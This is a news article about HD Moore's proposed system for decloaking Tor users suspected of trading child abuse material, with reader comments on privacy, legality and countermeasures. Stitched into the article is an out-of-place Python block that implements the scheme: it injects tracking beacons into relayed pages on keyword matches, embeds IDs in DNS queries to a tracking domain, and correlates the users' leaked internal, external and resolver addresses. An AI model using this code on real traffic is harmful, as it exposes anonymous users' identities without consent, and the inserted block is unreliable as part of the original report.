Hacker builds tracking system to nab Tor pedophiles

Summary: Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.

Moore, the brains behind the Metasploit Project, has come up with a series of countermeasures that combine patched Tor servers with a "decloaking engine" intended to identify the specific workstation, inside an organization or residence, from which the material was requested.

Moore first discussed his "countermeasures" at a meeting of the Austin Hackers Association (AHA) last summer, when it became clear that the EFF-backed anonymity/privacy network was being used for the most nefarious purposes. Further confirmation came last September, when German authorities cracked down on Tor node operators because of the proliferation of child porn.

In an e-mail interview, Moore said the plan is to release the source code, which will allow anyone to run a patched Tor server to help pinpoint pedophiles online.

Moore's description of the countermeasures:

1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client.

2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

3. The decloak engine is based on the following techniques:

a) A unique identifier is created to track this user.

b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user.

c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user.

e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user's NAT gateway.

f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence.

As to whether this is enough for law enforcement authorities to make an arrest and build a case, Moore's answer: "No idea."
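The pipeline Moore describes, as an added worked example in Python (this is not Moore's code; the article publishes no source): the response-side beacon injection of step 2, the DNS wire-format query that the applet of step 3e would send and the server-side parse that recovers the tracking id from the hostname of steps 3b/3e, and the per-id correlation of step 3f. The tracking domain `decloak.example`, the channel names and the RFC 5737 sample addresses are assumptions; the keyword list is whatever the operator supplies.

```python
"""Toy decloak engine (added example, not Moore's code). Stand-alone, offline."""
import os
import re
import struct

# Assumed tracking domain; the article does not name the real one.
TRACK_DOMAIN = "decloak.example"


def make_tracking_id() -> str:
    """Step 3a: per-client identifier, random so ids cannot be guessed or collide."""
    return os.urandom(8).hex()


def inject_beacon(html: str, tracking_id: str, keywords) -> str:
    """Step 2: if any keyword appears in the response body, append HTML that makes the
    browser resolve <id>.TRACK_DOMAIN (step 3b). Unchanged body when nothing matches."""
    body_lower = html.lower()
    if not any(k.lower() in body_lower for k in keywords):
        return html
    beacon = f'<img src="http://{tracking_id}.{TRACK_DOMAIN}/t.gif" width="1" height="1">'
    idx = body_lower.rfind("</body>")
    return html[:idx] + beacon + html[idx:] if idx != -1 else html + beacon


def build_dns_query(name: str, txid: int = 0x1234) -> bytes:
    """RFC 1035 A query, as the applet of step 3e would send directly over UDP."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_dns_qname(packet: bytes) -> str:
    """Server side of steps 3b/3e: extract the QNAME; reject malformed or hostile input."""
    if len(packet) < 12:
        raise ValueError("short DNS header")
    if struct.unpack("!H", packet[4:6])[0] != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12
    while True:
        if pos >= len(packet):
            raise ValueError("truncated QNAME")
        length = packet[pos]
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer not allowed in a query name")
        pos += 1
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)


def tracking_id_from_name(name: str):
    """Return the id embedded in <id>.TRACK_DOMAIN, or None for unrelated names."""
    m = re.fullmatch(r"([0-9a-f]{16})\." + re.escape(TRACK_DOMAIN), name.lower())
    return m.group(1) if m else None


class Correlator:
    """Step 3f: one record per tracking id, one observed address per channel."""
    CHANNELS = ("tor_exit", "dns_resolver", "internal_ip", "external_ip")

    def __init__(self):
        self.records = {}

    def record(self, tracking_id: str, channel: str, address: str) -> None:
        if channel not in self.CHANNELS:
            raise ValueError(f"unknown channel {channel!r}")
        self.records.setdefault(tracking_id, {})[channel] = address

    def profile(self, tracking_id: str) -> dict:
        r = dict(self.records.get(tracking_id, {}))
        # The out-of-band address is only informative if it differs from the Tor
        # exit: a client that forces every packet through Tor yields the exit again
        # (or nothing), and the engine has learned nothing a normal exit cannot see.
        ext = r.get("external_ip")
        r["decloaked"] = ext is not None and ext != r.get("tor_exit")
        return r


if __name__ == "__main__":
    # Constructed walk-through with RFC 5737 documentation addresses.
    tid = make_tracking_id()
    page = inject_beacon("<html><body>example keyword</body></html>", tid, ["keyword"])
    name = tracking_id_from_name(parse_dns_qname(build_dns_query(f"{tid}.{TRACK_DOMAIN}")))
    c = Correlator()
    c.record(name, "tor_exit", "198.51.100.7")       # seen by the patched exit
    c.record(name, "dns_resolver", "203.0.113.53")   # step 3b, ISP resolver
    c.record(name, "internal_ip", "192.168.1.23")    # step 3d, applet-reported
    c.record(name, "external_ip", "203.0.113.90")    # step 3e, raw UDP source
    print(page)
    print(c.profile(name))
```

The `decloaked` flag is the check a practitioner wants before treating the result as evidence: the technique depends on the client leaking DNS or UDP outside Tor, so a profile whose out-of-band address equals the Tor exit (or never arrives) means only that the client was configured correctly, not that the user was found.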

Talkback

27 comments
  • An arrest should be imminent

    "As to whether this is enough for law enforcement authorities to make an arrest and build a case, Moore's answer: "No idea.""

    Sounds like what Moore is doing is pretty clearly illegal. If he is in fact doing what he claims then law enforcement should have enough to arrest him. Pretty ballsy of him to be bragging about his exploits to the press.
    sweklaweklfwe@...
    • You even understand what's going on?

      HD is writing software that can help catch child pornographers. It's not up to him to install the monitoring software, he's only providing the software.
      georgeou
      • Do you understand?

        Oh my, he is "saving the children". Uh huh, as if the tech won't be used for a thousand other things.
        No_Ax_to_Grind
        • You are right on

          The govt will look for searches with "bomb" and "airlines". Hollywood will subpoena to look for anything copyrighted.

          Honestly, writing software like this is really not that difficult. Especially when the writer is writing both client and server pieces. The only surprise is that we haven't heard about software like this before now.
          Taz_z
        • That's the tradeoff, anything can be abused

          There is no simple solution to the problem. If you have true anonymity, you're going to have child pornographers abusing it. If you implement tracking technology, it COULD be abused for other things. Then again, what makes you think you're untraceable even if they didn't implement HD Moore's software?
          georgeou
    • RE: Hacker builds tracking system to nab Tor pedophiles

      @sweklaweklfwe@... yep, you are right. What is behind the BS this article pushes on us - he proposes to create a fake Tor package by injecting malicious code into it. In other words - a trojan.
      Win8AnUglyDisaster
  • His method is flawed and doesn't work!!!

    First, check out JanusVM (http://janusvm.peertech.org) which has been out since late May 2006, long before this "exploit" was published.

    Check out the metasploit site for the bypass "exploit" test.
    http://metasploit.com/research/misc/decloak/

    We don't have this problem with JanusVM.
    I use Java, Javascript, and Flash all the time, and don't have this issue.

    I tested it with ( JanusVM + IE 7.0 ) and ( JanusVM + Firefox).
    NO PROBLEMS.

    "Moore's description of the countermeasures:

    1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client."

    2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

    3. The decloak engine is based on the following techniques:

    a) A unique identifier is created to track this user.

    b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user."

    ** JanusVM redirects all DNS requests through Tor IF (and ONLY IF) the DNS server is not in the same LAN / netmask. I created TORSEC.exe with the last release of JanusVM and this checks for this "DNS leak" issue and corrects it. Then when the VPN disconnects (in Windows) it restores the DNS back to what it was before the VPN to the VM is established. DNS Problem solved. **

    "c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

    d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user."

    ** This will come back as 10.10.10.X, not the TRUE internal IP of the LAN or the ISP. Instead, it picks up the default IP of the VPN interface to the VM. **

    "e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP [DNS server]. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user's NAT gateway."

    ** Again, DNS requests are redirected through Tor (dns-proxy-tor) when set up correctly. This is funny! Because his DNS request is going to HIS server, and not the internal DNS server of the interface (probably assigned by DHCP to 192.168.1.1 or something with the ISP), it is going to hit the iptables rule and get routed through Tor when using JanusVM. Thank you! His applet just did EXACTLY what needs to be done to ensure the DNS requests are not being leaked with JanusVM, even if the user forgot to set an external DNS IP themselves or didn't run TORSEC.exe. His applet just broke itself behind JanusVM, and I don't think this was the result he intended... **

    "f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence."

    ** Not when I tested it.

    Again, JanusVM drops all ICMP, UDP, etc. and only allows TCP connections and DNS requests through Tor.

    This is a really cool trick this guy is doing, but if anything, it helps prove the point that when you don't implement and use a tool correctly, you can't expect the best results.
    (Sorry Moore ;)

    Don't get me wrong, I'm all about catching pedophiles, but you're not going to be able to do it this way. Personally, I like the way MSNBC does it with "To Catch a Predator". The idea of catching pedophiles is great, but not practical when wanting a true anonymous system.

    So, Tor works great when IMPLEMENTED correctly.

    Use JanusVM. End of Story.

    Kyle Williams
    JanusVM Lead Developer
    janusvm.peertech.org
    JanusVM
    • Actually, the basic premise does work

      That is basically how website visitors get tracked. The visitors execute some html or javascript in their web browsers that passes a request to another server with some identifying information so the visitor can be associated with the web site. That other server sees the external IP address of that visitor. In this case, the javascript is built dynamically when the search criteria is analyzed. If the visitor has cookies enabled, then he/she can be tracked across other Tor servers if he/she has a different IP address, like through a VPN.

      Nice promo for JanusVM though, and it didn't cost you a cent.
      Taz_z
      • :)

        "Nice promo for JanusVM though, and it didn't cost you a cent."

        :)
        JanusVM
      • Re: Actually, the basic premise does work

        lol
        You haven't used JanusVM before, have you? It's a free, non-commercial Tor client that basically VPNizes your whole net connection. Since HD Moore's methods depend on tricking your browser into using your "real" IP for making some requests, it will never work with JanusVM, because all IP traffic, regardless of protocol is intercepted and routed through Tor.

        The point here is that Moore is claiming to be defeating Tor, when he's really just exploiting misconfigured Tor clients. None of the attacks that he proposes compromise the Tor network/protocol itself. Considering what an amazing security researcher he is, it'd be nice if he'd put his effort into exposing real exploits in the Tor network instead of scoring cheap media points.

        The only exploit I can think of is to use malicious Java/Javascript/ActiveX code (or even a browser buffer overflow) to alter files on the client's local system - for example, altering the default home page - so that in the future if the user uses that browser without JanusVM, they're linked to their real IP. That, however, would require using malicious Java code to exploit the client, and would be illegal and fairly unarguably unethical in itself. Doesn't mean that a government or similarly powerful institution wouldn't be willing to do it though...

        The solution to this danger for the super-paranoid is of course to set aside a machine (or virtual machine) which always runs JanusVM and thus is "permanently anonymized".
        Someguy2
  • Message has been deleted.

    Reverend MacFellow
    • Only if he is looking at ...

      ... naked pictures of you. Your post was extremely childish!
      ShadeTree
  • The whole point of anonymous software is so people can do whatever they ..

    WANT. Yes, pedophiles are bad, but when you want to have a system that keeps you anonymous, this is going to happen. The whole point of onion routers is to protect the person on the other end. Hence onion: multiple layers of distraction and redirection between you and the end point.

    They should have thought about this before they created the software. You can be sure that people are using this software for more than just pedo stuff, hacking, criminal activities that involve fraud to the holy grail (atm)... terrorism.

    Yeah, it sucks, but when you're anonymous, you find out who you really are.
    Been_Done_Before
  • Thanks from Communist China, etc.

    What makes you think no one but people trying to catch child porn violators will use this method? If the TOR server can be patched to check for child porn related words it can be patched for terrorism-related words, governmental censorship, industrial espionage, insider trading, extortion and loads of other criminal purposes. And the people carrying out those activities have the finances and expertise to do it now that the details have been revealed.

    Also, loading Java or other programs that send data without the person's permission probably violates state and/or federal criminal and civil laws against unauthorized access to a computer. The fact that the person has Java enabled does not automatically constitute permission to access *any* information on the computer and send it wherever. Hacking the server to access the data in ways the system is not intended could violate federal laws against wiretapping. Someone using this software could face criminal hacking charges or a massive civil lawsuit if information was given out about someone and that person was not actually convicted.

    (And, yes, I am an attorney, licensed in Texas.)
    Rick_R
    • Reality check.

      Any technique can be used by anyone. How can you be sure that this type of analysis doesn't already happen in "Communist China"?
      sweklaweklfwe@...
    • Inadmissible Evidence?

      Let me see if I understand you correctly: are you implying that if a US law enforcement agency _were_ to use Moore's technique, the evidence would be inadmissible in court?

      Then in addition, the perp would risk the criminal hacking charges and/or civil lawsuit, since with only inadmissible evidence, a conviction would be unlikely.
      mejohnsn
  • Yes, this account...

    Is provided by BugMeNot, call it 'anonymous' =-)
    sweklaweklfwe@...
  • Different values

    The big questions to ask are:

    "Should the U.S. be enforcing and promoting U.S. values on the rest of the world's people?"

    and

    "At what point does the prevention of sexual exploitation of a child outweigh the protection of a person's right to privacy and free speech?"

    or more specifically

    "At what point does the rights of a child in a 3rd world nation outweigh the rights of a U.S. citizen?"

    This is a case of where you CAN'T have your cake and eat it too. Personally, I vote for privacy and free speech rights. It's my responsibility to take care of my kids. It's not anyone else's responsibility. And it's not my responsibility to take care of anyone else's kids. You people who want this kind of monitoring capability either haven't read 1984, or you must want to have just such an intolerable system to live in.

    As repulsive as I and most other Americans may find child pornography and sexual exploitation, there have been periods of time historically in other countries when such behavior was an accepted norm. And this is still considered an accepted norm in some countries today, in spite of lip service to American crusaders. But since we can't even agree on when a person is a child or an adult here in the U.S., we're never going to be able to resolve this on a world-wide basis. Is it when a person reaches 13? Is a person no longer a child once they become sexually mature enough to father a child or carry one to term? Is it 14, 15, 16, 17, 18, 21, 22, 24, or 25 years of age?

    If "adulthood" is a question of cognitive ability, then there are a lot of physically mature humans that never become adults.

    Of course if the condition of being "human" is a question of cognitive ability, then there sure are a lot of people in the world who aren't human.
    Dr_Zinj
  • seriously...

    only a fool enables any scripts when using TOR or anything else.

    noscript for the win!
    ZDNET_guest666
  • RE: Hacker builds tracking system to nab Tor pedophiles

    As a concept this is nothing new: interception, tagging and tracing. It's as old as the internet.

    What I find alarming is that this uses the lowest common denominator (to rile people up) to justify techniques that most people (if not under the veil of Pedo tracking) would find totally unacceptable.

    If implemented this can be too easily exploited for any keywords.

    Not like George Bush?

    Search for like minded people who don't like him either and end up with the FBI at your door.

    OK, so that is a joke example, but on a serious note this is really what this represents: removing privacy to openly have freedom of speech, so let's stop trying to hide it under the veil of pedo tracing techniques.
    13thHouR